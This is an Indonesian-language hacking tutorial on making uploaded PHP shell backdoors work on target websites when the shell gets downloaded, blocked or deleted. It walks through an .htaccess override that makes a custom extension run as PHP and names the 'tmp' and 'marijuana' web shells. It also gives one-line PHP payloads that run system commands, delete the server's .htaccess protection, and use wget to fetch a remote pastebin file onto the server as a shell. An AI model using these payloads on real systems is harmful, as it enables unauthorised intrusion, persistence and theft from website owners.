3 Tipe Bypass Shell Backdoor (Terdownload, Forbidden, Terhapus)
Shell backdoor adalah sebuah program atau skrip yang secara diam-diam memberikan akses ilegal ke sistem komputer atau server tanpa sepengetahuan atau izin pemilik sistem. Backdoor ini dinamakan "shell" karena biasanya memberikan akses ke shell komputer, yang merupakan antarmuka baris perintah untuk mengendalikan sistem.
Tujuan utama dari shell backdoor adalah untuk memberikan akses dan kontrol penuh ke sistem target kepada penyerang atau pihak yang tidak sah. Dengan akses tersebut, penyerang dapat melakukan berbagai macam tindakan berbahaya, seperti mencuri data sensitif, merusak sistem, atau bahkan menggunakannya sebagai platform untuk serangan yang lebih luas.
Biasanya shell backdoor dibuat dengan format php atau asp, namun tidak menutup kemungkinan shell backdoor memiliki extensi yang lain. Shell backdoor sendiri punya beberapa fungsi, yaitu:
- Mendapatkan akses lebih terhadap website
- Sebagai jalur belakang hacker untuk masuk kembali (tanpa exploitasi ulang)
- Meracuni website dengan code jahat agar terjadi kerusakan pada website
Dalam beberapa kasus saat kita ingin mengakses shell backdoor pada target, shell yang kita upload sering kali terdownload, kita mempunyai beberapa teknik untuk bypass kasus ini
Mengatasi Shell Backdoor Yang Forbidden dan Terhapus
Ada beberapa penyebab shell backdoor forbidden atau terhapus, salah satunya adalah penggunaan filter dimana melakukan block pada script tertentu. Kasus ini dapat diatasi dengan menggunakan shell tmp atau marijuana. untuk source codenya seperti berikut
Tmp Shell Backdoor
- Kalian bisa ubah url shell indoxploit dengan url shell kalian (dalam bentuk txt)
Marijuana Shell Backdoor
Bypass Shell Backdoor Dengan Override .htaccess
- Buat file dengan nama .htaccess dengan isi sebagai berikut
AddType application/x-httpd-php .cyberlone
- Upload ke server target, jika tidak bisa terupload coba gunakan burp dan ganti ektensi
- Siapkan Shell Marijuana dan rename menjadi Marijuana.nakanosec
- Upload Shell Marijuana.Cyberlone kemudian coba akses
Bypass Shell Backdoor Dengan One Line Shell
- Buat file cyberlone.php
- Isi cyberlone.php dengan payload dibawah
<?php
system("id")
?>
- Upload ke server target
- Shell akan terdownload tapi command akan tereksekusi
- Untuk upload shell remove dulu .htaccess dengan payload berikut
<?php
system("rm .htaccess")
?>
- kemudian untuk uploadnya gunakan payload berikut
<?php
system("wget https://pastebin.com/raw/7ZLbRc3s -O cyberlone.php")
?>